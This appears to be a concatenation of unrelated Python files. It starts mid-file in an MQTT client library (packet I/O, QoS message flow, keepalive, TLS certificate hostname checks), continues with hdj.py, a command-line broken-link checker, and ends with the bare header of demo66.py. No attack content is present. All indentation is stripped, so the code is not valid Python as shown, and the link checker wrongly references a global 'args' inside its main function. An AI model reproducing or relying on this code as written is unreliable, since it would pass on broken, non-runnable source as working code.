self.on_message_filtered[i] = (sub, callback)
self._callback_mutex.release()
return
self.on_message_filtered.append((sub, callback))
self._callback_mutex.release()
def message_callback_remove(self, sub):
"""Remove a message callback previously registered with
message_callback_add()."""
if sub is None:
raise ValueError("sub must defined.")
self._callback_mutex.acquire()
for i in range(0, len(self.on_message_filtered)):
if self.on_message_filtered[i][0] == sub:
self.on_message_filtered.pop(i)
self._callback_mutex.release()
return
self._callback_mutex.release()
# ============================================================
# Private functions
# ============================================================
def _loop_rc_handle(self, rc):
if rc:
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
self._state_mutex.acquire()
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
self._state_mutex.release()
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
return rc
def _packet_read(self):
# This gets called if pselect() indicates that there is network data
# available - ie. at least one byte. What we do depends on what data we
# already have.
# If we've not got a command, attempt to read one and save it. This should
# always work because it's only a single byte.
# Then try to read the remaining length. This may fail because it is may
# be more than one byte - will need to save data pending next read if it
# does fail.
# Then try to read the remaining payload, where 'payload' here means the
# combined variable header and actual payload. This is the most likely to
# fail due to longer length, so save current data and current position.
# After all data is read, send to _mqtt_handle_packet() to deal with.
# Finally, free the memory and reset everything to starting conditions.
if self._in_packet['command'] == 0:
try:
if self._ssl:
command = self._ssl.read(1)
else:
command = self._sock.recv(1)
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
if len(command) == 0:
return 1
command = struct.unpack("!B", command)
self._in_packet['command'] = command[0]
if self._in_packet['have_remaining'] == 0:
# Read remaining
# Algorithm for decoding taken from pseudo code at
# http://publib.boulder.ibm.com/infocenter/wmbhelp/v6r0m0/topic/com.ibm.etools.mft.doc/ac10870_.htm
while True:
try:
if self._ssl:
byte = self._ssl.read(1)
else:
byte = self._sock.recv(1)
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
byte = struct.unpack("!B", byte)
byte = byte[0]
self._in_packet['remaining_count'].append(byte)
# Max 4 bytes length for remaining length as defined by protocol.
# Anything more likely means a broken/malicious client.
if len(self._in_packet['remaining_count']) > 4:
return MQTT_ERR_PROTOCOL
self._in_packet['remaining_length'] = self._in_packet['remaining_length'] + (byte & 127)*self._in_packet['remaining_mult']
self._in_packet['remaining_mult'] = self._in_packet['remaining_mult'] * 128
if (byte & 128) == 0:
break
self._in_packet['have_remaining'] = 1
self._in_packet['to_process'] = self._in_packet['remaining_length']
while self._in_packet['to_process'] > 0:
try:
if self._ssl:
data = self._ssl.read(self._in_packet['to_process'])
else:
data = self._sock.recv(self._in_packet['to_process'])
except socket.error as err:
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
else:
self._in_packet['to_process'] = self._in_packet['to_process'] - len(data)
self._in_packet['packet'] = self._in_packet['packet'] + data
# All data for this packet is read.
self._in_packet['pos'] = 0
rc = self._packet_handle()
# Free data and reset values
self._in_packet = dict(
command=0,
have_remaining=0,
remaining_count=[],
remaining_mult=1,
remaining_length=0,
packet=b"",
to_process=0,
pos=0)
self._msgtime_mutex.acquire()
self._last_msg_in = time.time()
self._msgtime_mutex.release()
return rc
def _packet_write(self):
self._current_out_packet_mutex.acquire()
while self._current_out_packet:
packet = self._current_out_packet
try:
if self._ssl:
write_length = self._ssl.write(packet['packet'][packet['pos']:])
else:
write_length = self._sock.send(packet['packet'][packet['pos']:])
except AttributeError:
self._current_out_packet_mutex.release()
return MQTT_ERR_SUCCESS
except socket.error as err:
self._current_out_packet_mutex.release()
if self._ssl and (err.errno == ssl.SSL_ERROR_WANT_READ or err.errno == ssl.SSL_ERROR_WANT_WRITE):
return MQTT_ERR_AGAIN
if err.errno == EAGAIN:
return MQTT_ERR_AGAIN
print(err)
return 1
if write_length > 0:
packet['to_process'] = packet['to_process'] - write_length
packet['pos'] = packet['pos'] + write_length
if packet['to_process'] == 0:
if (packet['command'] & 0xF0) == PUBLISH and packet['qos'] == 0:
self._callback_mutex.acquire()
if self.on_publish:
self._in_callback = True
self.on_publish(self, self._userdata, packet['mid'])
self._in_callback = False
self._callback_mutex.release()
if (packet['command'] & 0xF0) == DISCONNECT:
self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, 0)
self._in_callback = False
self._callback_mutex.release()
if self._ssl:
self._ssl.close()
self._ssl = None
if self._sock:
self._sock.close()
self._sock = None
return MQTT_ERR_SUCCESS
self._out_packet_mutex.acquire()
if len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
else:
self._current_out_packet = None
self._out_packet_mutex.release()
else:
pass # FIXME
self._current_out_packet_mutex.release()
self._msgtime_mutex.acquire()
self._last_msg_out = time.time()
self._msgtime_mutex.release()
return MQTT_ERR_SUCCESS
def _easy_log(self, level, buf):
if self.on_log:
self.on_log(self, self._userdata, level, buf)
def _check_keepalive(self):
now = time.time()
self._msgtime_mutex.acquire()
last_msg_out = self._last_msg_out
last_msg_in = self._last_msg_in
self._msgtime_mutex.release()
if (self._sock is not None or self._ssl is not None) and (now - last_msg_out >= self._keepalive or now - last_msg_in >= self._keepalive):
if self._state == mqtt_cs_connected and self._ping_t == 0:
self._send_pingreq()
self._msgtime_mutex.acquire()
self._last_msg_out = now
self._last_msg_in = now
self._msgtime_mutex.release()
else:
if self._ssl:
self._ssl.close()
self._ssl = None
elif self._sock:
self._sock.close()
self._sock = None
if self._state == mqtt_cs_disconnecting:
rc = MQTT_ERR_SUCCESS
else:
rc = 1
self._callback_mutex.acquire()
if self.on_disconnect:
self._in_callback = True
self.on_disconnect(self, self._userdata, rc)
self._in_callback = False
self._callback_mutex.release()
def _mid_generate(self):
self._last_mid = self._last_mid + 1
if self._last_mid == 65536:
self._last_mid = 1
return self._last_mid
def _topic_wildcard_len_check(self, topic):
# Search for + or # in a topic. Return MQTT_ERR_INVAL if found.
# Also returns MQTT_ERR_INVAL if the topic string is too long.
# Returns MQTT_ERR_SUCCESS if everything is fine.
if '+' in topic or '#' in topic or len(topic) == 0 or len(topic) > 65535:
return MQTT_ERR_INVAL
else:
return MQTT_ERR_SUCCESS
def _send_pingreq(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGREQ")
rc = self._send_simple_command(PINGREQ)
if rc == MQTT_ERR_SUCCESS:
self._ping_t = time.time()
return rc
def _send_pingresp(self):
self._easy_log(MQTT_LOG_DEBUG, "Sending PINGRESP")
return self._send_simple_command(PINGRESP)
def _send_puback(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBACK (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBACK, mid, False)
def _send_pubcomp(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBCOMP (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBCOMP, mid, False)
def _pack_remaining_length(self, packet, remaining_length):
remaining_bytes = []
while True:
byte = remaining_length % 128
remaining_length = remaining_length // 128
# If there are more digits to encode, set the top bit of this digit
if remaining_length > 0:
byte = byte | 0x80
remaining_bytes.append(byte)
packet.extend(struct.pack("!B", byte))
if remaining_length == 0:
# FIXME - this doesn't deal with incorrectly large payloads
return packet
def _pack_str16(self, packet, data):
if sys.version_info[0] < 3:
if isinstance(data, bytearray):
packet.extend(struct.pack("!H", len(data)))
packet.extend(data)
elif isinstance(data, str):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
elif isinstance(data, unicode):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
else:
raise TypeError
else:
if isinstance(data, bytearray) or isinstance(data, bytes):
packet.extend(struct.pack("!H", len(data)))
packet.extend(data)
elif isinstance(data, str):
udata = data.encode('utf-8')
pack_format = "!H" + str(len(udata)) + "s"
packet.extend(struct.pack(pack_format, len(udata), udata))
else:
raise TypeError
def _send_publish(self, mid, topic, payload=None, qos=0, retain=False, dup=False):
if self._sock is None and self._ssl is None:
return MQTT_ERR_NO_CONN
utopic = topic.encode('utf-8')
command = PUBLISH | ((dup&0x1)<<3) | (qos<<1) | retain
packet = bytearray()
packet.extend(struct.pack("!B", command))
if payload is None:
remaining_length = 2+len(utopic)
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBLISH (d"+str(dup)+", q"+str(qos)+", r"+str(int(retain))+", m"+str(mid)+", '"+topic+"' (NULL payload)")
else:
if isinstance(payload, str):
upayload = payload.encode('utf-8')
payloadlen = len(upayload)
elif isinstance(payload, bytearray):
payloadlen = len(payload)
elif isinstance(payload, unicode):
upayload = payload.encode('utf-8')
payloadlen = len(upayload)
remaining_length = 2+len(utopic) + payloadlen
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBLISH (d"+str(dup)+", q"+str(qos)+", r"+str(int(retain))+", m"+str(mid)+", '"+topic+"', ... ("+str(payloadlen)+" bytes)")
if qos > 0:
# For message id
remaining_length = remaining_length + 2
self._pack_remaining_length(packet, remaining_length)
self._pack_str16(packet, topic)
if qos > 0:
# For message id
packet.extend(struct.pack("!H", mid))
if payload is not None:
if isinstance(payload, str):
pack_format = str(payloadlen) + "s"
packet.extend(struct.pack(pack_format, upayload))
elif isinstance(payload, bytearray):
packet.extend(payload)
elif isinstance(payload, unicode):
pack_format = str(payloadlen) + "s"
packet.extend(struct.pack(pack_format, upayload))
else:
raise TypeError('payload must be a string, unicode or a bytearray.')
return self._packet_queue(PUBLISH, packet, mid, qos)
def _send_pubrec(self, mid):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREC (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBREC, mid, False)
def _send_pubrel(self, mid, dup=False):
self._easy_log(MQTT_LOG_DEBUG, "Sending PUBREL (Mid: "+str(mid)+")")
return self._send_command_with_mid(PUBREL|2, mid, dup)
def _send_command_with_mid(self, command, mid, dup):
# For PUBACK, PUBCOMP, PUBREC, and PUBREL
if dup:
command = command | 8
remaining_length = 2
packet = struct.pack('!BBH', command, remaining_length, mid)
return self._packet_queue(command, packet, mid, 1)
def _send_simple_command(self, command):
# For DISCONNECT, PINGREQ and PINGRESP
remaining_length = 0
packet = struct.pack('!BB', command, remaining_length)
return self._packet_queue(command, packet, 0, 0)
def _send_connect(self, keepalive, clean_session):
if self._protocol == MQTTv31:
protocol = PROTOCOL_NAMEv31
proto_ver = 3
else:
protocol = PROTOCOL_NAMEv311
proto_ver = 4
remaining_length = 2+len(protocol) + 1+1+2 + 2+len(self._client_id)
connect_flags = 0
if clean_session:
connect_flags = connect_flags | 0x02
if self._will:
if self._will_payload is not None:
remaining_length = remaining_length + 2+len(self._will_topic) + 2+len(self._will_payload)
else:
remaining_length = remaining_length + 2+len(self._will_topic) + 2
connect_flags = connect_flags | 0x04 | ((self._will_qos&0x03) << 3) | ((self._will_retain&0x01) << 5)
if self._username:
remaining_length = remaining_length + 2+len(self._username)
connect_flags = connect_flags | 0x80
if self._password:
connect_flags = connect_flags | 0x40
remaining_length = remaining_length + 2+len(self._password)
command = CONNECT
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
packet.extend(struct.pack("!H"+str(len(protocol))+"sBBH", len(protocol), protocol, proto_ver, connect_flags, keepalive))
self._pack_str16(packet, self._client_id)
if self._will:
self._pack_str16(packet, self._will_topic)
if self._will_payload is None or len(self._will_payload) == 0:
packet.extend(struct.pack("!H", 0))
else:
self._pack_str16(packet, self._will_payload)
if self._username:
self._pack_str16(packet, self._username)
if self._password:
self._pack_str16(packet, self._password)
self._keepalive = keepalive
return self._packet_queue(command, packet, 0, 0)
def _send_disconnect(self):
return self._send_simple_command(DISCONNECT)
def _send_subscribe(self, dup, topics):
remaining_length = 2
for t in topics:
remaining_length = remaining_length + 2+len(t[0])+1
command = SUBSCRIBE | (dup<<3) | (1<<1)
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t[0])
packet.extend(struct.pack("B", t[1]))
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _send_unsubscribe(self, dup, topics):
remaining_length = 2
for t in topics:
remaining_length = remaining_length + 2+len(t)
command = UNSUBSCRIBE | (dup<<3) | (1<<1)
packet = bytearray()
packet.extend(struct.pack("!B", command))
self._pack_remaining_length(packet, remaining_length)
local_mid = self._mid_generate()
packet.extend(struct.pack("!H", local_mid))
for t in topics:
self._pack_str16(packet, t)
return (self._packet_queue(command, packet, local_mid, 1), local_mid)
def _message_retry_check_actual(self, messages, mutex):
mutex.acquire()
now = time.time()
for m in messages:
if m.timestamp + self._message_retry < now:
if m.state == mqtt_ms_wait_for_puback or m.state == mqtt_ms_wait_for_pubrec:
m.timestamp = now
m.dup = True
self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
elif m.state == mqtt_ms_wait_for_pubrel:
m.timestamp = now
m.dup = True
self._send_pubrec(m.mid)
elif m.state == mqtt_ms_wait_for_pubcomp:
m.timestamp = now
m.dup = True
self._send_pubrel(m.mid, True)
mutex.release()
def _message_retry_check(self):
self._message_retry_check_actual(self._out_messages, self._out_message_mutex)
self._message_retry_check_actual(self._in_messages, self._in_message_mutex)
def _messages_reconnect_reset_out(self):
self._out_message_mutex.acquire()
self._inflight_messages = 0
for m in self._out_messages:
m.timestamp = 0
if self._max_inflight_messages == 0 or self._inflight_messages < self._max_inflight_messages:
if m.qos == 0:
m.state = mqtt_ms_publish
elif m.qos == 1:
#self._inflight_messages = self._inflight_messages + 1
if m.state == mqtt_ms_wait_for_puback:
m.dup = True
m.state = mqtt_ms_publish
elif m.qos == 2:
#self._inflight_messages = self._inflight_messages + 1
if m.state == mqtt_ms_wait_for_pubcomp:
m.state = mqtt_ms_resend_pubrel
m.dup = True
else:
if m.state == mqtt_ms_wait_for_pubrec:
m.dup = True
m.state = mqtt_ms_publish
else:
m.state = mqtt_ms_queued
self._out_message_mutex.release()
def _messages_reconnect_reset_in(self):
self._in_message_mutex.acquire()
for m in self._in_messages:
m.timestamp = 0
if m.qos != 2:
self._in_messages.pop(self._in_messages.index(m))
else:
# Preserve current state
pass
self._in_message_mutex.release()
def _messages_reconnect_reset(self):
self._messages_reconnect_reset_out()
self._messages_reconnect_reset_in()
def _packet_queue(self, command, packet, mid, qos):
mpkt = dict(
command = command,
mid = mid,
qos = qos,
pos = 0,
to_process = len(packet),
packet = packet)
self._out_packet_mutex.acquire()
self._out_packet.append(mpkt)
if self._current_out_packet_mutex.acquire(False):
if self._current_out_packet is None and len(self._out_packet) > 0:
self._current_out_packet = self._out_packet.pop(0)
self._current_out_packet_mutex.release()
self._out_packet_mutex.release()
# Write a single byte to sockpairW (connected to sockpairR) to break
# out of select() if in threaded mode.
try:
self._sockpairW.send(sockpair_data)
except socket.error as err:
if err.errno != EAGAIN:
raise
if not self._in_callback and self._thread is None:
return self.loop_write()
else:
return MQTT_ERR_SUCCESS
def _packet_handle(self):
cmd = self._in_packet['command']&0xF0
if cmd == PINGREQ:
return self._handle_pingreq()
elif cmd == PINGRESP:
return self._handle_pingresp()
elif cmd == PUBACK:
return self._handle_pubackcomp("PUBACK")
elif cmd == PUBCOMP:
return self._handle_pubackcomp("PUBCOMP")
elif cmd == PUBLISH:
return self._handle_publish()
elif cmd == PUBREC:
return self._handle_pubrec()
elif cmd == PUBREL:
return self._handle_pubrel()
elif cmd == CONNACK:
return self._handle_connack()
elif cmd == SUBACK:
return self._handle_suback()
elif cmd == UNSUBACK:
return self._handle_unsuback()
else:
# If we don't recognise the command, return an error straight away.
self._easy_log(MQTT_LOG_ERR, "Error: Unrecognised command "+str(cmd))
return MQTT_ERR_PROTOCOL
def _handle_pingreq(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
self._easy_log(MQTT_LOG_DEBUG, "Received PINGREQ")
return self._send_pingresp()
def _handle_pingresp(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 0:
return MQTT_ERR_PROTOCOL
# No longer waiting for a PINGRESP.
self._ping_t = 0
self._easy_log(MQTT_LOG_DEBUG, "Received PINGRESP")
return MQTT_ERR_SUCCESS
def _handle_connack(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
if len(self._in_packet['packet']) != 2:
return MQTT_ERR_PROTOCOL
(flags, result) = struct.unpack("!BB", self._in_packet['packet'])
if result == CONNACK_REFUSED_PROTOCOL_VERSION and self._protocol == MQTTv311:
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK ("+str(flags)+", "+str(result)+"), attempting downgrade to MQTT v3.1.")
# Downgrade to MQTT v3.1
self._protocol = MQTTv31
return self.reconnect()
if result == 0:
self._state = mqtt_cs_connected
self._easy_log(MQTT_LOG_DEBUG, "Received CONNACK ("+str(flags)+", "+str(result)+")")
self._callback_mutex.acquire()
if self.on_connect:
self._in_callback = True
if sys.version_info[0] < 3:
argcount = self.on_connect.func_code.co_argcount
else:
argcount = self.on_connect.__code__.co_argcount
if argcount == 3:
self.on_connect(self, self._userdata, result)
else:
flags_dict = dict()
flags_dict['session present'] = flags & 0x01
self.on_connect(self, self._userdata, flags_dict, result)
self._in_callback = False
self._callback_mutex.release()
# Start counting for stable connection
self._backoffCore.startStableConnectionTimer()
if result == 0:
rc = 0
self._out_message_mutex.acquire()
for m in self._out_messages:
m.timestamp = time.time()
if m.state == mqtt_ms_queued:
self.loop_write() # Process outgoing messages that have just been queued up
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
if m.qos == 0:
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.qos == 1:
if m.state == mqtt_ms_publish:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_puback
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.qos == 2:
if m.state == mqtt_ms_publish:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_pubrec
self._in_callback = True # Don't call loop_write after _send_publish()
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
elif m.state == mqtt_ms_resend_pubrel:
self._inflight_messages = self._inflight_messages + 1
m.state = mqtt_ms_wait_for_pubcomp
self._in_callback = True # Don't call loop_write after _send_pubrel()
rc = self._send_pubrel(m.mid, m.dup)
self._in_callback = False
if rc != 0:
self._out_message_mutex.release()
return rc
self.loop_write() # Process outgoing messages that have just been queued up
self._out_message_mutex.release()
return rc
elif result > 0 and result < 6:
return MQTT_ERR_CONN_REFUSED
else:
return MQTT_ERR_PROTOCOL
def _handle_suback(self):
self._easy_log(MQTT_LOG_DEBUG, "Received SUBACK")
pack_format = "!H" + str(len(self._in_packet['packet'])-2) + 's'
(mid, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = "!" + "B"*len(packet)
granted_qos = struct.unpack(pack_format, packet)
self._callback_mutex.acquire()
if self.on_subscribe:
self._in_callback = True
self.on_subscribe(self, self._userdata, mid, granted_qos)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_publish(self):
rc = 0
header = self._in_packet['command']
message = MQTTMessage()
message.dup = (header & 0x08)>>3
message.qos = (header & 0x06)>>1
message.retain = (header & 0x01)
pack_format = "!H" + str(len(self._in_packet['packet'])-2) + 's'
(slen, packet) = struct.unpack(pack_format, self._in_packet['packet'])
pack_format = '!' + str(slen) + 's' + str(len(packet)-slen) + 's'
(message.topic, packet) = struct.unpack(pack_format, packet)
if len(message.topic) == 0:
return MQTT_ERR_PROTOCOL
if sys.version_info[0] >= 3:
message.topic = message.topic.decode('utf-8')
if message.qos > 0:
pack_format = "!H" + str(len(packet)-2) + 's'
(message.mid, packet) = struct.unpack(pack_format, packet)
message.payload = packet
self._easy_log(
MQTT_LOG_DEBUG,
"Received PUBLISH (d"+str(message.dup)+
", q"+str(message.qos)+", r"+str(message.retain)+
", m"+str(message.mid)+", '"+message.topic+
"', ... ("+str(len(message.payload))+" bytes)")
message.timestamp = time.time()
if message.qos == 0:
self._handle_on_message(message)
return MQTT_ERR_SUCCESS
elif message.qos == 1:
rc = self._send_puback(message.mid)
self._handle_on_message(message)
return rc
elif message.qos == 2:
rc = self._send_pubrec(message.mid)
message.state = mqtt_ms_wait_for_pubrel
self._in_message_mutex.acquire()
self._in_messages.append(message)
self._in_message_mutex.release()
return rc
else:
return MQTT_ERR_PROTOCOL
def _handle_pubrel(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
if len(self._in_packet['packet']) != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREL (Mid: "+str(mid)+")")
self._in_message_mutex.acquire()
for i in range(len(self._in_messages)):
if self._in_messages[i].mid == mid:
# Only pass the message on if we have removed it from the queue - this
# prevents multiple callbacks for the same message.
self._handle_on_message(self._in_messages[i])
self._in_messages.pop(i)
self._inflight_messages = self._inflight_messages - 1
if self._max_inflight_messages > 0:
self._out_message_mutex.acquire()
rc = self._update_inflight()
self._out_message_mutex.release()
if rc != MQTT_ERR_SUCCESS:
self._in_message_mutex.release()
return rc
self._in_message_mutex.release()
return self._send_pubcomp(mid)
self._in_message_mutex.release()
return MQTT_ERR_SUCCESS
def _update_inflight(self):
# Dont lock message_mutex here
for m in self._out_messages:
if self._inflight_messages < self._max_inflight_messages:
if m.qos > 0 and m.state == mqtt_ms_queued:
self._inflight_messages = self._inflight_messages + 1
if m.qos == 1:
m.state = mqtt_ms_wait_for_puback
elif m.qos == 2:
m.state = mqtt_ms_wait_for_pubrec
rc = self._send_publish(m.mid, m.topic, m.payload, m.qos, m.retain, m.dup)
if rc != 0:
return rc
else:
return MQTT_ERR_SUCCESS
return MQTT_ERR_SUCCESS
def _handle_pubrec(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received PUBREC (Mid: "+str(mid)+")")
self._out_message_mutex.acquire()
for m in self._out_messages:
if m.mid == mid:
m.state = mqtt_ms_wait_for_pubcomp
m.timestamp = time.time()
self._out_message_mutex.release()
return self._send_pubrel(mid, False)
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_unsuback(self):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received UNSUBACK (Mid: "+str(mid)+")")
self._callback_mutex.acquire()
if self.on_unsubscribe:
self._in_callback = True
self.on_unsubscribe(self, self._userdata, mid)
self._in_callback = False
self._callback_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_pubackcomp(self, cmd):
if self._strict_protocol:
if self._in_packet['remaining_length'] != 2:
return MQTT_ERR_PROTOCOL
mid = struct.unpack("!H", self._in_packet['packet'])
mid = mid[0]
self._easy_log(MQTT_LOG_DEBUG, "Received "+cmd+" (Mid: "+str(mid)+")")
self._out_message_mutex.acquire()
for i in range(len(self._out_messages)):
try:
if self._out_messages[i].mid == mid:
# Only inform the client the message has been sent once.
self._callback_mutex.acquire()
if self.on_publish:
self._out_message_mutex.release()
self._in_callback = True
self.on_publish(self, self._userdata, mid)
self._in_callback = False
self._out_message_mutex.acquire()
self._callback_mutex.release()
self._out_messages.pop(i)
self._inflight_messages = self._inflight_messages - 1
if self._max_inflight_messages > 0:
rc = self._update_inflight()
if rc != MQTT_ERR_SUCCESS:
self._out_message_mutex.release()
return rc
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
except IndexError:
# Have removed item so i>count.
# Not really an error.
pass
self._out_message_mutex.release()
return MQTT_ERR_SUCCESS
def _handle_on_message(self, message):
self._callback_mutex.acquire()
matched = False
for t in self.on_message_filtered:
if topic_matches_sub(t[0], message.topic):
self._in_callback = True
t[1](self, self._userdata, message)
self._in_callback = False
matched = True
if matched == False and self.on_message:
self._in_callback = True
self.on_message(self, self._userdata, message)
self._in_callback = False
self._callback_mutex.release()
def _thread_main(self):
self._state_mutex.acquire()
if self._state == mqtt_cs_connect_async:
self._state_mutex.release()
self.reconnect()
else:
self._state_mutex.release()
self.loop_forever()
def _host_matches_cert(self, host, cert_host):
if cert_host[0:2] == "*.":
if cert_host.count("*") != 1:
return False
host_match = host.split(".", 1)[1]
cert_match = cert_host.split(".", 1)[1]
if host_match == cert_match:
return True
else:
return False
else:
if host == cert_host:
return True
else:
return False
def _tls_match_hostname(self):
try:
cert = self._ssl.getpeercert()
except AttributeError:
# the getpeercert can throw Attribute error: object has no attribute 'peer_certificate'
# Don't let that crash the whole client. See also: http://bugs.python.org/issue13721
raise ssl.SSLError('Not connected')
san = cert.get('subjectAltName')
if san:
have_san_dns = False
for (key, value) in san:
if key == 'DNS':
have_san_dns = True
if self._host_matches_cert(self._host.lower(), value.lower()) == True:
return
if key == 'IP Address':
have_san_dns = True
if value.lower() == self._host.lower():
return
if have_san_dns:
# Only check subject if subjectAltName dns not found.
raise ssl.SSLError('Certificate subject does not match remote hostname.')
subject = cert.get('subject')
if subject:
for ((key, value),) in subject:
if key == 'commonName':
if self._host_matches_cert(self._host.lower(), value.lower()) == True:
return
raise ssl.SSLError('Certificate subject does not match remote hostname.')
# Compatibility class for easy porting from mosquitto.py.
class Mosquitto(Client):
def __init__(self, client_id="", clean_session=True, userdata=None):
super(Mosquitto, self).__init__(client_id, clean_session, userdata)
|
hdj.py
|
import src.hdj_fileio as hdj_fileio # setup.py does not include other files if imported not like this
import src.hdj_linkchecker as hdj_linkchecker
import src.hdj_util as hdj_util
import argparse
import sys
import threading
"""
Command link argument program control
"""
def main(arguments):
if arguments.url:
try:
soup = hdj_linkchecker.make_soup_object(arguments.url)
threading.Thread(target=hdj_linkchecker.checker(soup)).start()
except Exception as e:
print("Threading exception handled in Main. Details of the Exception: ", e)
sys.exit(1)
sys.exit(0)
if arguments.surl:
req = hdj_linkchecker.single_link_check(arguments.surl)
try:
if req in range(200, 226):
print(
f"Status code for {arguments.surl} is good: {req}. Looks like it's up!"
)
elif req in range(400, 420):
print(
f"Status code for {arguments.surl} is bad: {req}. Can't find what you want!"
)
# Garbage way of checking for user input
answer = input(
f"Would you like to test the links at: {arguments.surl}? (Y/N) "
)
if answer == "Y" or answer == "y":
soup = hdj_linkchecker.make_soup_object(arguments.surl)
threading.Thread(target=hdj_linkchecker.checker(soup)).start()
except ConnectionError:
print(f"Having issues working with {arguments.surl}. Is it a valid URL?")
elif arguments.file:
try:
soup = hdj_fileio.file_check(arguments.file)
threading.Thread(target=hdj_linkchecker.checker(soup)).start()
except Exception as e:
print("Threading exception handled in Main. Details of the Exception: ", e)
sys.exit(1)
sys.exit(0)
elif arguments.telescope:
try:
hdj_linkchecker.telescope()
except Exception as e:
print("Threading exception handled in Main. Details of the Exception: ", e)
sys.exit(1)
sys.exit(0)
elif arguments.ignore:
try:
soup = hdj_linkchecker.ignore(
arguments.ignore[0][0], arguments.ignore[0][1]
)
threading.Thread(target=hdj_linkchecker.checker(soup)).start()
except Exception as e:
print("Threading exception handled in Main. Details of the Exception: ", e)
sys.exit(1)
sys.exit(0)
elif args.version:
hdj_util.version()
sys.exit(0)
parser = argparse.ArgumentParser(
description="See below for optional flags.", prefix_chars="-/"
)
parser.add_argument(
"-u",
"--url",
"-url",
metavar="",
help="The url to check for broken links. Example: -u https://google.ca",
)
parser.add_argument(
"-su",
"--surl",
"-singleurl",
metavar="",
help="Checks the status of the link passed to the checker. Example: -su https://google.ca",
)
parser.add_argument(
"-f",
"--file",
"-file",
metavar="",
help="Checks through a specified html file that is "
"located in the current working directory. Example: -f index.html",
)
parser.add_argument(
"-t",
"--telescope",
"-telescope",
action="store_true",
help="Function to download the last 10 indexed posts "
"from Telescope (must be running locally)",
)
parser.add_argument(
"-i",
"--ignore",
"-ignore",
metavar="",
nargs=2,
action="append",
help="Specify a file filled with links to ignore "
"when checking a specified page.",
)
parser.add_argument(
"-v", "--version", "-version", action="store_true", help="Specifies the version"
)
args = parser.parse_args()
def main_wrapper():
main(args)
if len(sys.argv) == 1:
print("This program checks for broken links. Please specify -h for help.")
sys.exit(1)
else:
main_wrapper()
if __name__ == "__main__":
main_wrapper()
|
demo66.py
|
# -*- coding:utf-8 -*-
# @Time :2019/11/27 9:43 上午
# @Author :Dg
import random
import time
